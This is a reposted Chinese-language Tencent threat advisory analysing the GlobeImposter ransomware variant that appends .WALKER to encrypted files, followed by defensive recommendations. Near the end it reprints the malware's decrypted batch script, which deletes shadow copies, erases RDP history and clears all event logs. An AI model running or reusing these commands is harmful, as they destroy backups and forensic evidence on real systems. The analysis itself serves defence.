新聞中心
聯(lián)系我們
地址:上海市閔行區(qū)莘東路505號(hào)綠捷中心10樓1005室
熱線:400-8838-021
傳真:021-54855973
E-mai:zjedwine@163.com
預(yù)警!多家大型企業(yè)遭遇GlobeImposter勒索病毒襲擊,文件被加密為.WALKER擴(kuò)展名
2018/8/27 11:18:15 點(diǎn)擊:2628 來自:admin
騰訊御見威脅情報(bào)中心(下稱騰訊安全)于2018.8.26日監(jiān)控到國內(nèi)某重要通信廠商多地子公司發(fā)生GlobeImposter勒索病毒攻擊事件,其中病毒樣本攻擊變種與8.24日騰訊安全發(fā)布的GlobeImposter勒索病毒預(yù)警中樣本有所區(qū)別,其加密后將文件后綴名改為“WALKER”。
0x1?概述
騰訊御見威脅情報(bào)中心(下稱騰訊安全)于2018.8.26日監(jiān)控到國內(nèi)某重要通信廠商多地子公司發(fā)生GlobeImposter勒索病毒攻擊事件,其中病毒樣本攻擊變種與8.24日騰訊安全發(fā)布的GlobeImposter勒索病毒預(yù)警中樣本有所區(qū)別,其加密后將文件后綴名改為“WALKER”。
經(jīng)過騰訊安全緊急分析,此次GlobeImposter勒索病毒變種攻擊的主要方式仍是暴力破解RDP遠(yuǎn)程登錄密碼后,再進(jìn)一步在內(nèi)網(wǎng)橫向滲透。值得注意的是,與近期其他版本勒索病毒主要針對服務(wù)器以及數(shù)據(jù)庫文件加密不同,此次爆發(fā)的GlobeImposter勒索病毒并不區(qū)分被入侵機(jī)器是否服務(wù)器,一旦入侵成功后直接感染。除個(gè)別路徑外,所有文件都被加密為后輟名為“WALKER”的文件。
除上述某重要通信廠商外,騰訊安全監(jiān)控到7月底開始有不同行業(yè)的各企業(yè)遭受此次WALKER變種攻擊。攻擊者疑似有意選擇8.25日-8.26日周末期間進(jìn)行大規(guī)模入侵,我們預(yù)測近一周可能有較多企業(yè)遭受類似攻擊。
GlobeImposter勒索病毒在一段時(shí)間內(nèi)并無實(shí)質(zhì)性技術(shù)更新,近日在部分企業(yè)內(nèi)網(wǎng)爆發(fā),對個(gè)人電腦用戶影響較小。我們提醒企業(yè)用戶高度重視近期GlobeImposter勒索病毒的破壞行為,提前備份關(guān)鍵業(yè)務(wù)系統(tǒng),避免遭遇勒索病毒破壞之后業(yè)務(wù)系統(tǒng)出現(xiàn)嚴(yán)重?fù)p失。
對于已經(jīng)中毒的系統(tǒng),建議在內(nèi)網(wǎng)下線處理,病毒清理完畢才能重新接入網(wǎng)絡(luò)。內(nèi)網(wǎng)其他未中毒的電腦,使用弱口令登錄的建議盡快修改,使用由字母、數(shù)字和特殊字符組合的復(fù)雜密碼,避免攻擊者暴力破解成功(企業(yè)網(wǎng)管可配置強(qiáng)制使用強(qiáng)壯密碼,杜絕使用弱密碼登錄);及時(shí)修復(fù)操作系統(tǒng)補(bǔ)丁,避免因漏洞導(dǎo)致攻擊入侵事件發(fā)生;終端用戶若不使用遠(yuǎn)程桌面登錄服務(wù),建議關(guān)閉;局域網(wǎng)內(nèi)已發(fā)生勒索病毒入侵的,可暫時(shí)關(guān)閉135,139,445端口(暫時(shí)禁用Server服務(wù))以減少遠(yuǎn)程入侵的可能。
0x2?影響評級(jí)
高危,黑客首先會(huì)入侵企業(yè)內(nèi)網(wǎng),之后再通過暴力破解RDP和SMB服務(wù)在內(nèi)網(wǎng)繼續(xù)擴(kuò)散。除個(gè)別文件夾外,都被加密,除非得到密鑰,受損文件無法解密還原。
?
0x3?影響面
Windows系統(tǒng)的電腦會(huì)被波及,目前,御見威脅情報(bào)中心發(fā)現(xiàn)廣東、河南、黑龍江等地已有多個(gè)企業(yè)受害,預(yù)計(jì)近期還會(huì)有增加。
0x4?樣本分析
入侵分析
1、從某感染用戶機(jī)器上可以看到,8月25日至8月26日凌晨有大量445端口爆破記錄
圖1
攻擊源是內(nèi)網(wǎng)中非本地區(qū)的某臺(tái)機(jī)器,顯示該企業(yè)內(nèi)各地分公司都已存在相應(yīng)風(fēng)險(xiǎn)。
樣本分析
加密算法說明
勒索病毒使用了RSA+AES加密方式,加密過程中涉及兩對RSA密鑰(分別為黑客公私鑰和用戶公私鑰,分別用hacker_rsa_xxx和user_rsa_xxx表示這兩對密鑰)和一對AES密鑰。黑客RSA密鑰用于加密用戶RSA密鑰,用戶RSA密鑰用于加密AES密鑰,AES密鑰用于加密文件內(nèi)容。
具體的加密過程為:勒索病毒首先解碼出一個(gè)內(nèi)置的RSA公鑰(hacker_rsa_pub),同時(shí)對每個(gè)受害用戶,使用RSA生成公私鑰(user_rsa_pub和user_rsa_pri),其中生成的密鑰信息使用內(nèi)置的RSA公鑰(hacker_rsa_Public)進(jìn)行加密后,做為用戶ID。在遍歷系統(tǒng)文件,對符合加密要求的文件進(jìn)行加密。對每個(gè)文件,通過CoCreateGuid生成一個(gè)唯一標(biāo)識(shí)符,并由該唯一標(biāo)識(shí)符最終生成AES密鑰(記為file_aes_key),對文件進(jìn)行加密。在加密文件的過程中,該唯一標(biāo)識(shí)符會(huì)通過RSA公鑰?(user_rsa_pub)?加密后保存到文件中。
黑客在收到贖金、用戶ID和文件后,通過自己的私鑰(hacker_rsa_pri)解密用戶ID,可以得到user_rsa_pri,使用user_rsa_pri解密文件,就可以得到文件的file_aes_key,進(jìn)而可以通過AES算法解密出原始文件。
圖2
自啟動(dòng)分析
惡意代碼樣本為了防止被輕易地分析,加密了大多數(shù)字符串和一部分API,運(yùn)行后會(huì)在內(nèi)存中動(dòng)態(tài)解密,解密后可以看到樣本在加密時(shí)排除的文件夾與后綴名。首先獲取環(huán)境變量“%LOCALAPPADATA%”、“%APPDATA%”的路徑,若獲取不到則退出;獲取到后,將自身拷貝到該目錄下,然后添加自啟動(dòng)項(xiàng)。
?
圖3
復(fù)制之后,將路徑寫到以下注冊表項(xiàng)中
HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\BrowserUpdateCheck,使得自身能夠開機(jī)自啟動(dòng)
圖4
加密過程分析
獲取當(dāng)前機(jī)器上每個(gè)盤符:
圖5
對每個(gè)盤符分別創(chuàng)建一個(gè)線程,進(jìn)行文件加密
圖6
加密文件前,首先會(huì)過濾掉后綴為.WALKER,文件名為HOW_TO_BACK_FILES.html以及保存用戶ID的文件,此外還會(huì)過濾掉如下路徑下的文件:
圖7
然后進(jìn)行加密
圖8
GlobeImposter對文件的加密使用的是AES加密算法。AES加密的KEY在本地隨機(jī)生成。首先AES加密時(shí)的IV參數(shù)由當(dāng)前文件的大小和文件路徑共同生成。IV參數(shù)將MD(filesize|| filename )后取前16位。
圖9
將IV與另外生成的secret key使用MBEDTLS_MD_SHA256計(jì)算2次HASH,并將HASH結(jié)果做為AES加密的KEY
圖10
隨后,使用內(nèi)置的RSA公鑰將guid進(jìn)行加密,并將加密過的guid及用戶ID寫入到當(dāng)前文件中。
圖11
最后用AES加密文件內(nèi)容
圖12
自刪除分析
通過調(diào)用CMD /c del,來進(jìn)行自刪除
圖13
在Temp目錄下,釋放.bat腳本文件,主要用來刪除遠(yuǎn)程桌面連接信息文件default.rdp,并通過wevtutil.exe cl命令刪除日志信息
圖14
解密出來的bat文件內(nèi)容如下
@echo off
vssadmin.exe Delete Shadows /All /Quiet
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
cd %userprofile%\documents\
attrib Default.rdp -s -h
del Default.rdp
for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
?
?
0x5?解決方案
?? 全網(wǎng)安裝專業(yè)的終端安全管理軟件,由管理員批量殺毒和安裝補(bǔ)丁,后續(xù)定期更新各類系統(tǒng)高危補(bǔ)丁。
?? 部署流量監(jiān)控/阻斷類設(shè)備/軟件,便于事前發(fā)現(xiàn),事中阻斷和事后回溯。
?? 建議由于其他原因不能及時(shí)安裝補(bǔ)丁的系統(tǒng),考慮在網(wǎng)絡(luò)邊界、路由器、防火墻上設(shè)置嚴(yán)格的訪問控制策略,以保證網(wǎng)絡(luò)的動(dòng)態(tài)安全。
?? 建議對于存在弱口令的系統(tǒng),需在加強(qiáng)使用者安全意識(shí)的前提下,督促其修改密碼,或者使用策略來強(qiáng)制限制密碼長度和復(fù)雜性。
?? 建議對于存在弱口令或是空口令的服務(wù),在一些關(guān)鍵服務(wù)上,應(yīng)加強(qiáng)口令強(qiáng)度,同時(shí)需使用加密傳輸方式,對于一些可關(guān)閉的服務(wù)來說,建議關(guān)閉不要的服務(wù)端口以達(dá)到安全目的。不使用相同口令管理多臺(tái)關(guān)鍵服務(wù)器。
?? 建議網(wǎng)絡(luò)管理員、系統(tǒng)管理員、安全管理員關(guān)注安全信息、安全動(dòng)態(tài)及最新的嚴(yán)重漏洞,攻與防的循環(huán),伴隨每個(gè)主流操作系統(tǒng)、應(yīng)用服務(wù)的生命周期。
?? 建議對數(shù)據(jù)庫賬戶密碼策略建議進(jìn)行配置,對最大錯(cuò)誤登錄次數(shù)、超過有效次數(shù)進(jìn)行鎖定、密碼有效期、到期后的寬限時(shí)間、密碼重用等策略進(jìn)行加固設(shè)置。
?? 建議對數(shù)據(jù)庫的管理訪問節(jié)點(diǎn)地址進(jìn)行嚴(yán)格限制,只允許特定管理主機(jī)IP進(jìn)行遠(yuǎn)程登錄數(shù)據(jù)庫。
為防止黑客入侵,需要更加完善的防護(hù)體系:各終端使用騰訊御點(diǎn)防止病毒攻擊,御點(diǎn)具備終端殺毒統(tǒng)一管控、修復(fù)漏洞統(tǒng)一管控,以及策略管控等全方位的安全管理功能,可幫助醫(yī)療機(jī)構(gòu)管理者全面了解、管理企業(yè)內(nèi)網(wǎng)安全狀況、保護(hù)醫(yī)療機(jī)構(gòu)網(wǎng)絡(luò)信息安全。
除此之外,在內(nèi)網(wǎng)部署騰訊御界高級(jí)威脅檢測系統(tǒng)、騰訊御見安全態(tài)勢感知平臺(tái)和騰訊御知網(wǎng)絡(luò)空間風(fēng)險(xiǎn)雷達(dá)等產(chǎn)品,在終端安全、邊界安全、網(wǎng)站監(jiān)測、統(tǒng)一監(jiān)控方面建立一套集風(fēng)險(xiǎn)監(jiān)測、分析、預(yù)警、響應(yīng)和可視化為一體的安全體系,全方位立體化保障企業(yè)用戶的網(wǎng)絡(luò)安全,及時(shí)阻止黑客入侵。
為防止遭勒索病毒攻擊,各企業(yè)用戶應(yīng)及時(shí)給服務(wù)器打好安全補(bǔ)丁,盡量關(guān)閉不必要的文件共享、端口和服務(wù),采用高強(qiáng)度的唯一服務(wù)器帳號(hào)/密碼并定期更換,對沒有互聯(lián)需求的服務(wù)器/工作站內(nèi)部訪問設(shè)置訪問控制,在終端電腦上使用騰訊?“御點(diǎn)”防御病毒木馬攻擊。
圖15
同時(shí),推薦企業(yè)用戶關(guān)鍵業(yè)務(wù)配置備份系統(tǒng),將重要業(yè)務(wù)數(shù)據(jù)創(chuàng)建多個(gè)備份和異地備份,避免備份數(shù)據(jù)也被勒索病毒破壞。一旦有病毒感染事件發(fā)生,也可快速恢復(fù)重建業(yè)務(wù)系統(tǒng),避免重大損失發(fā)生。
個(gè)人用戶可及時(shí)安裝操作系統(tǒng)漏洞補(bǔ)丁,安全備份重要數(shù)據(jù)及文件,同時(shí)開啟文檔守護(hù)者以免遭勒索病毒破壞。
上一篇:預(yù)警!多家大型企業(yè)遭遇GlobeImposter勒索病毒襲擊,文件被加密為.WALKER擴(kuò)展名